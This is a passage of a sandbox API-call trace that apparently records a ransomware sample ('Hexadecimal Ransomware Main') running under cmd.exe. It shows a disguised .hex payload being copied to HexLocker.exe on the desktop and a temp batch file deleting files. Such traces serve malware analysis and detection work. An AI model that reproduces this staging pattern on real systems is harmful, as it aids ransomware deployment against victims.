(_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0110.762] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0110.763] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0110.763] GetProcessHeap () returned 0x1dc256b0000 [0110.763] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c3440) returned 1 [0110.764] GetProcessHeap () returned 0x1dc256b0000 [0110.764] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256c3200 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0110.764] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0110.765] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0110.766] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0110.766] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0110.766] GetProcessHeap () returned 0x1dc256b0000 [0110.766] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c3200) returned 1 [0110.766] GetProcessHeap () returned 0x1dc256b0000 [0110.766] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xd4) returned 0x1dc256c66f0 [0110.766] GetProcessHeap () returned 0x1dc256b0000 [0110.766] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256c66f0, Size=0x72) returned 0x1dc256c66f0 [0110.766] GetProcessHeap () returned 0x1dc256b0000 [0110.766] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c66f0) returned 0x72 [0110.766] GetProcessHeap () returned 0x1dc256b0000 [0110.766] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256beba0 [0110.766] GetProcessHeap () returned 0x1dc256b0000 [0110.766] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256bc4a0 [0110.766] _wcsicmp (_String1="HexLK.hex", _String2=".") returned 58 [0110.766] _wcsicmp (_String1="HexLK.hex", _String2="..") returned 58 [0110.766] GetFileAttributesW (lpFileName="HexLK.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlk.hex")) returned 0x20 [0110.767] GetProcessHeap () returned 0x1dc256b0000 [0110.767] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256beae0 [0110.767] GetProcessHeap () returned 0x1dc256b0000 [0110.767] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256be260 [0110.767] _wcsicmp (_String1="HexLocker.exe", _String2=".") returned 58 [0110.767] _wcsicmp (_String1="HexLocker.exe", _String2="..") returned 58 [0110.767] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x407419e9fc, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x407419e9fc, ReturnLength=0x0) returned 0x0 [0110.767] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x407419e9f8, ProcessInformationLength=0x4) returned 0x0 [0110.767] malloc (_Size=0xffce) returned 0x1dc25800120 [0110.769] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0110.769] malloc (_Size=0xffce) returned 0x1dc25810100 [0110.770] ??_V@YAXPEAX@Z () returned 0x1dc25810100 [0110.770] malloc (_Size=0xffce) returned 0x1dc258200e0 [0110.770] ??_V@YAXPEAX@Z () returned 0x1dc258200e0 [0110.771] malloc (_Size=0x1ff9c) returned 0x1dc258300c0 [0110.771] ??_V@YAXPEAX@Z () returned 0x1dc258300c0 [0110.772] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x1dc25610000 [0110.773] FindFirstFileExW (in: lpFileName="HexLK.hex", fInfoLevelId=0x1, lpFindFileData=0x1dc256bc4b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1dc256bc4b0) returned 0x1dc256bf020 [0110.773] malloc (_Size=0xffce) returned 0x1dc25850070 [0110.773] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0110.774] malloc (_Size=0xffce) returned 0x1dc25860050 [0110.774] ??_V@YAXPEAX@Z () returned 0x1dc25860050 [0110.774] ??_V@YAXPEAX@Z () returned 0x1 [0110.774] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe", nBufferLength=0x7fe7, lpBuffer=0x1dc25850070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe", lpFilePart=0x0) returned 0x25 [0110.775] ??_V@YAXPEAX@Z () returned 0x1 [0110.776] _wcsicmp (_String1="HexLK.hex", _String2="con") returned 5 [0110.776] CreateFileW (lpFileName="HexLK.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlk.hex"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419e000, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x9c [0110.776] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0110.776] _get_osfhandle (_FileHandle=3) returned 0x9c [0110.776] GetFileType (hFile=0x9c) returned 0x1 [0110.777] SetErrorMode (uMode=0x0) returned 0x0 [0110.777] SetErrorMode (uMode=0x1) returned 0x0 [0110.777] GetFullPathNameW (in: lpFileName="HexLK.hex", nBufferLength=0xffce, lpBuffer=0x1dc258300c0, lpFilePart=0x407419e050 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex", lpFilePart=0x407419e050*="HexLK.hex") returned 0x21 [0110.777] SetErrorMode (uMode=0x0) returned 0x1 [0110.777] _get_osfhandle (_FileHandle=3) returned 0x9c [0110.777] ReadFile (in: hFile=0x9c, lpBuffer=0x1dc25610000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x407419e084, lpOverlapped=0x0 | out: lpBuffer=0x1dc25610000*, lpNumberOfBytesRead=0x407419e084*=0x200, lpOverlapped=0x0) returned 1 [0110.778] malloc (_Size=0x1ff9c) returned 0x1dc25850070 [0110.779] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0110.780] SetErrorMode (uMode=0x0) returned 0x0 [0110.780] SetErrorMode (uMode=0x1) returned 0x0 [0110.780] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe", nBufferLength=0xffce, lpBuffer=0x1dc25850070, lpFilePart=0x407419dde0 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe", lpFilePart=0x407419dde0*="HexLocker.exe") returned 0x25 [0110.780] SetErrorMode (uMode=0x0) returned 0x1 [0110.780] _wcsicmp (_String1="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex", _String2="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe") returned -4 [0110.780] ??_V@YAXPEAX@Z () returned 0x1 [0110.781] GetProcessHeap () returned 0x1dc256b0000 [0110.781] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256be4d0 [0110.781] _wcsicmp (_String1="HexLocker.exe", _String2=".") returned 58 [0110.781] _wcsicmp (_String1="HexLocker.exe", _String2="..") returned 58 [0110.781] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe")) returned 0xffffffff [0110.782] GetLastError () returned 0x2 [0110.782] malloc (_Size=0xffce) returned 0x1dc25850070 [0110.782] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0110.783] malloc (_Size=0xffce) returned 0x1dc25860050 [0110.783] ??_V@YAXPEAX@Z () returned 0x1dc25860050 [0110.784] ??_V@YAXPEAX@Z () returned 0x1 [0110.784] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe", nBufferLength=0x7fe7, lpBuffer=0x1dc25850070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe", lpFilePart=0x0) returned 0x25 [0110.784] ??_V@YAXPEAX@Z () returned 0x1 [0110.785] malloc (_Size=0x1ff9c) returned 0x1dc25850070 [0110.786] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0110.787] SetErrorMode (uMode=0x0) returned 0x0 [0110.787] SetErrorMode (uMode=0x1) returned 0x0 [0110.787] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe", nBufferLength=0xffce, lpBuffer=0x1dc25850070, lpFilePart=0x407419dde0 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe", lpFilePart=0x407419dde0*="HexLocker.exe") returned 0x25 [0110.787] SetErrorMode (uMode=0x0) returned 0x1 [0110.787] _wcsicmp (_String1="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex", _String2="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe") returned -4 [0110.787] ??_V@YAXPEAX@Z () returned 0x1 [0110.788] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe")) returned 0xffffffff [0110.789] CopyFileExW (lpExistingFileName="HexLK.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlk.hex"), lpNewFileName="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x7ff67b909834, dwCopyFlags=0x0) returned 1 [0111.251] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe")) returned 0x20 [0111.251] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop\\HexLocker.exe", dwFileAttributes=0x20) returned 1 [0111.251] _close (_FileHandle=3) returned 0 [0111.252] FindNextFileW (in: hFindFile=0x1dc256bf020, lpFindFileData=0x1dc256bc4b0 | out: lpFindFileData=0x1dc256bc4b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3faede2, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd3faede2, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3ffc408, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xc4066, dwReserved0=0x0, dwReserved1=0x0, cFileName="HexLK.hex", cAlternateFileName="")) returned 0 [0111.252] GetLastError () returned 0x12 [0111.252] FindClose (in: hFindFile=0x1dc256bf020 | out: hFindFile=0x1dc256bf020) returned 1 [0111.254] ??_V@YAXPEAX@Z () returned 0x1 [0111.256] ??_V@YAXPEAX@Z () returned 0x1 [0111.258] ??_V@YAXPEAX@Z () returned 0x1 [0111.260] ??_V@YAXPEAX@Z () returned 0x1 [0111.322] _vsnwprintf (in: _Buffer=0x7ff67b920310, _BufferCount=0x103, _Format="%9d", _ArgList=0x407419e9d8 | out: _Buffer=" 1") returned 9 [0111.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.322] GetFileType (hFile=0x50) returned 0x2 [0111.322] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0111.322] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x407419e8c8 | out: lpMode=0x407419e8c8) returned 1 [0111.344] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.344] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x50, lpConsoleScreenBufferInfo=0x407419e900 | out: lpConsoleScreenBufferInfo=0x407419e900) returned 1 [0111.358] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x7ff67b917f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0111.359] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x7ff67b917f60, nSize=0x2000, Arguments=0x407419e9a0 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0111.359] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff67b917f60*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x407419e8f0, lpReserved=0x0 | out: lpBuffer=0x7ff67b917f60*, lpNumberOfCharsWritten=0x407419e8f0*=0x1b) returned 1 [0111.537] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x407419e9fc, ProcessInformationLength=0x4) returned 0x0 [0111.537] ??_V@YAXPEAX@Z () returned 0x1 [0111.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.540] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0111.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0111.660] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0111.738] _get_osfhandle (_FileHandle=0) returned 0x4c [0111.738] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0111.811] SetConsoleInputExeNameW () returned 0x1 [0111.811] GetConsoleOutputCP () returned 0x1b5 [0111.883] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0111.883] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.964] ??_V@YAXPEAX@Z () returned 0x1 [0111.968] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0111.968] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0111.968] _get_osfhandle (_FileHandle=3) returned 0xa0 [0111.968] SetFilePointer (in: hFile=0xa0, lDistanceToMove=365, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x16d [0111.968] GetProcessHeap () returned 0x1dc256b0000 [0111.968] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be4d0) returned 1 [0111.968] GetProcessHeap () returned 0x1dc256b0000 [0111.968] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be260) returned 1 [0111.968] GetProcessHeap () returned 0x1dc256b0000 [0111.968] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256beae0) returned 1 [0111.968] GetProcessHeap () returned 0x1dc256b0000 [0111.968] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc4a0) returned 1 [0111.968] GetProcessHeap () returned 0x1dc256b0000 [0111.968] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256beba0) returned 1 [0111.968] GetProcessHeap () returned 0x1dc256b0000 [0111.969] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c66f0) returned 1 [0111.969] GetProcessHeap () returned 0x1dc256b0000 [0111.969] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bef00) returned 1 [0111.969] GetProcessHeap () returned 0x1dc256b0000 [0111.969] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bea20) returned 1 [0111.969] GetProcessHeap () returned 0x1dc256b0000 [0111.969] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c0dc0) returned 1 [0111.969] GetProcessHeap () returned 0x1dc256b0000 [0111.969] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bcf20) returned 1 [0111.969] GetProcessHeap () returned 0x1dc256b0000 [0111.969] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bcea0) returned 1 [0111.969] GetProcessHeap () returned 0x1dc256b0000 [0111.969] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c3230) returned 1 [0111.969] GetProcessHeap () returned 0x1dc256b0000 [0111.969] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0111.969] VirtualFree (lpAddress=0x1dc25610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0111.970] _get_osfhandle (_FileHandle=3) returned 0xa0 [0111.970] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16d [0111.970] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x7c, lpOverlapped=0x0) returned 1 [0111.971] SetFilePointer (in: hFile=0xa0, lDistanceToMove=382, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x17e [0111.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=17, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="del rd000db.dll\r\n\\Users\\%username%\\desktop\\HexLocker.exe\r\nexe\r\nWindows\\MicrosoftNTSystem.sys\r\n") returned 17 [0111.971] _get_osfhandle (_FileHandle=3) returned 0xa0 [0111.971] GetFileType (hFile=0xa0) returned 0x1 [0111.971] _get_osfhandle (_FileHandle=3) returned 0xa0 [0111.971] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x17e [0111.971] GetProcessHeap () returned 0x1dc256b0000 [0111.971] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256d86c0 [0111.973] GetProcessHeap () returned 0x1dc256b0000 [0111.973] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d86c0) returned 1 [0111.975] _wcsicmp (_String1="del", _String2=")") returned 59 [0111.975] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0111.975] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0111.975] _wcsicmp (_String1="IF", _String2="del") returned 5 [0111.975] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0111.975] _wcsicmp (_String1="REM", _String2="del") returned 14 [0111.975] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0111.975] GetProcessHeap () returned 0x1dc256b0000 [0111.975] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0111.975] GetProcessHeap () returned 0x1dc256b0000 [0111.975] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x18) returned 0x1dc256c4050 [0111.975] GetProcessHeap () returned 0x1dc256b0000 [0111.975] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x2a) returned 0x1dc256c2a50 [0111.976] _tell (_FileHandle=3) returned 382 [0111.976] _close (_FileHandle=3) returned 0 [0111.976] malloc (_Size=0xffce) returned 0x1dc257e0160 [0111.978] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0111.979] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0111.979] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0111.979] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0111.979] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0112.102] malloc (_Size=0xffce) returned 0x1dc257f0140 [0112.102] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0112.103] malloc (_Size=0xffce) returned 0x1dc25800120 [0112.103] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0112.104] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0112.104] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0112.104] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0112.104] ??_V@YAXPEAX@Z () returned 0x1 [0112.106] GetProcessHeap () returned 0x1dc256b0000 [0112.106] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x44) returned 0x1dc256bf630 [0112.106] GetProcessHeap () returned 0x1dc256b0000 [0112.106] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bf630, Size=0x2a) returned 0x1dc256c2a90 [0112.106] GetProcessHeap () returned 0x1dc256b0000 [0112.106] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c2a90) returned 0x2a [0112.106] GetProcessHeap () returned 0x1dc256b0000 [0112.106] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x32) returned 0x1dc256c2e90 [0112.106] malloc (_Size=0xffce) returned 0x1dc25800120 [0112.107] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0112.108] GetProcessHeap () returned 0x1dc256b0000 [0112.108] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x44) returned 0x1dc256bf3b0 [0112.108] GetProcessHeap () returned 0x1dc256b0000 [0112.108] RtlReAllocateHeap 